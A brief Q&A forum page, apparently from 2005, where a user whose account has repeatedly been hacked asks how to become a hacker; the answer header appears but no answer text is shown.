How I can become hacker because I had a lot of troubles. Many times my ID has been hacked.

 

Answer by gvoind_30s
Submitted on 9/22/2005
Rating: Not yet rated Rate this answer: